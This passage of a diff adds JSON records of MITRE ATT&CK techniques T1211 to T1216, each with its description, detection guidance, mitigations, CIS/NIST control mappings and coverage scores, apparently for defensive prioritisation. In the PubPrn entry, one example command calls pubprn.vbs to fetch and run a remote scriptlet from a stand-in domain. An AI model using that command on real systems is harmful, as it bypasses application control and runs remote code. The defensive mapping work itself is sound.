+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1019",
+                "name": "Threat Intelligence Program",
+                "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.",
+                "url": "https://attack.mitre.org/mitigations/M1019"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1016",
+                "name": "Vulnerability Scanning",
+                "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
+                "url": "https://attack.mitre.org/mitigations/M1016"
+            }
+        ],
+        "cumulative_score": 0.730952380952381,
+        "adjusted_score": 0.730952380952381,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "3.12",
+            "4.1",
+            "4.4",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "7.6",
+            "10.5",
+            "12.2",
+            "12.8",
+            "16.13",
+            "16.8",
+            "18.1",
+            "18.2",
+            "18.3",
+            "18.5",
+            "16.10"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-2",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-8",
+            "RA-10",
+            "RA-5",
+            "SC-18",
+            "SC-2",
+            "SC-26",
+            "SC-29",
+            "SC-3",
+            "SC-30",
+            "SC-35",
+            "SC-39",
+            "SC-46",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-5",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.580952380952381,
+            "mitigation_score": 1,
+            "detection_score": 0.12
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1211",
+        "name": "Exploitation for Defense Evasion",
+        "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.",
+        "url": "https://attack.mitre.org/techniques/T1211",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            },
+            {
+                "mid": "M1019",
+                "name": "Threat Intelligence Program",
+                "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.",
+                "url": "https://attack.mitre.org/mitigations/M1019"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.4417428242857143,
+        "adjusted_score": 0.4417428242857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "10.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "RA-10",
+            "RA-5",
+            "SC-18",
+            "SC-2",
+            "SC-26",
+            "SC-29",
+            "SC-3",
+            "SC-30",
+            "SC-35",
+            "SC-39",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-5",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.3142857142857143,
+            "mitigation_score": 0.5636363636363636,
+            "detection_score": 0.04
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.02745711
+    },
+    {
+        "tid": "T1212",
+        "name": "Exploitation for Credential Access",
+        "description": "Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.",
+        "url": "https://attack.mitre.org/techniques/T1212",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1048",
+                "name": "Application Isolation and Sandboxing",
+                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
+                "url": "https://attack.mitre.org/mitigations/M1048"
+            },
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            },
+            {
+                "mid": "M1019",
+                "name": "Threat Intelligence Program",
+                "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.",
+                "url": "https://attack.mitre.org/mitigations/M1019"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.4571428571428572,
+        "adjusted_score": 0.4571428571428572,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.4",
+            "7.5",
+            "10.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-4",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "RA-10",
+            "RA-5",
+            "SC-18",
+            "SC-2",
+            "SC-26",
+            "SC-29",
+            "SC-3",
+            "SC-30",
+            "SC-35",
+            "SC-39",
+            "SC-7",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-5",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.35714285714285715,
+            "mitigation_score": 0.5818181818181818,
+            "detection_score": 0.11
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1213",
+        "name": "Data from Information Repositories",
+        "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.",
+        "url": "https://attack.mitre.org/techniques/T1213",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. ",
+        "platforms": [
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Logon Session: Logon Session Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1213.001",
+                "name": "Data from Information Repositories: Confluence",
+                "url": "https://attack.mitre.org/techniques/T1213/001",
+                "description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
+                "detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1213.002",
+                "name": "Data from Information Repositories: Sharepoint",
+                "url": "https://attack.mitre.org/techniques/T1213/002",
+                "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
+                "detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1213.003",
+                "name": "Data from Information Repositories: Code Repositories",
+                "url": "https://attack.mitre.org/techniques/T1213/003",
+                "description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)",
+                "detection": "Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.47619047619047616,
+        "adjusted_score": 0.47619047619047616,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.1",
+            "3.2",
+            "3.3",
+            "4.7",
+            "5.3",
+            "6.1",
+            "6.2",
+            "6.8",
+            "14.1",
+            "14.4",
+            "14.5",
+            "16.1",
+            "16.9",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-2",
+            "AC-21",
+            "AC-23",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-4",
+            "IA-8",
+            "RA-5",
+            "SC-28",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.3761904761904762,
+            "mitigation_score": 0.7090909090909091,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1213.001",
+        "name": "Data from Information Repositories: Confluence",
+        "description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
+        "url": "https://attack.mitre.org/techniques/T1213/001",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
+        "platforms": [
+            "SaaS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Logon Session: Logon Session Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1213",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.4714285714285714,
+        "adjusted_score": 0.4714285714285714,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.1",
+            "3.2",
+            "3.3",
+            "4.7",
+            "5.3",
+            "6.1",
+            "6.2",
+            "6.8",
+            "14.1",
+            "14.4",
+            "14.5",
+            "16.1",
+            "16.9",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-2",
+            "AC-21",
+            "AC-23",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-4",
+            "IA-8",
+            "RA-5",
+            "SC-28",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1213.002",
+        "name": "Data from Information Repositories: Sharepoint",
+        "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
+        "url": "https://attack.mitre.org/techniques/T1213/002",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n",
+        "platforms": [
+            "Office 365",
+            "Windows"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Logon Session: Logon Session Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1213",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.4714285714285714,
+        "adjusted_score": 0.4714285714285714,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.1",
+            "3.2",
+            "3.3",
+            "4.7",
+            "5.3",
+            "6.1",
+            "6.2",
+            "6.8",
+            "14.1",
+            "14.4",
+            "14.5",
+            "16.1",
+            "16.9",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-2",
+            "AC-21",
+            "AC-23",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-4",
+            "IA-8",
+            "RA-5",
+            "SC-28",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1213.003",
+        "name": "Data from Information Repositories: Code Repositories",
+        "description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)",
+        "url": "https://attack.mitre.org/techniques/T1213/003",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.",
+        "platforms": [
+            "SaaS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Logon Session: Logon Session Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1213",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "IA-2",
+            "IA-9",
+            "RA-5",
+            "SA-10",
+            "SA-11",
+            "SA-15",
+            "SA-3",
+            "SA-8",
+            "SI-2"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1216",
+        "name": "Signed Script Proxy Execution",
+        "description": "Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
+        "url": "https://attack.mitre.org/techniques/T1216",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1216.001",
+                "name": "Signed Script Proxy Execution: PubPrn",
+                "url": "https://attack.mitre.org/techniques/T1216/001",
+                "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).",
+                "detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
+                "mitigations": [
+                    {
+                        "mid": "M1040",
+                        "name": "Behavior Prevention on Endpoint",
+                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                        "url": "https://attack.mitre.org/mitigations/M1040"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
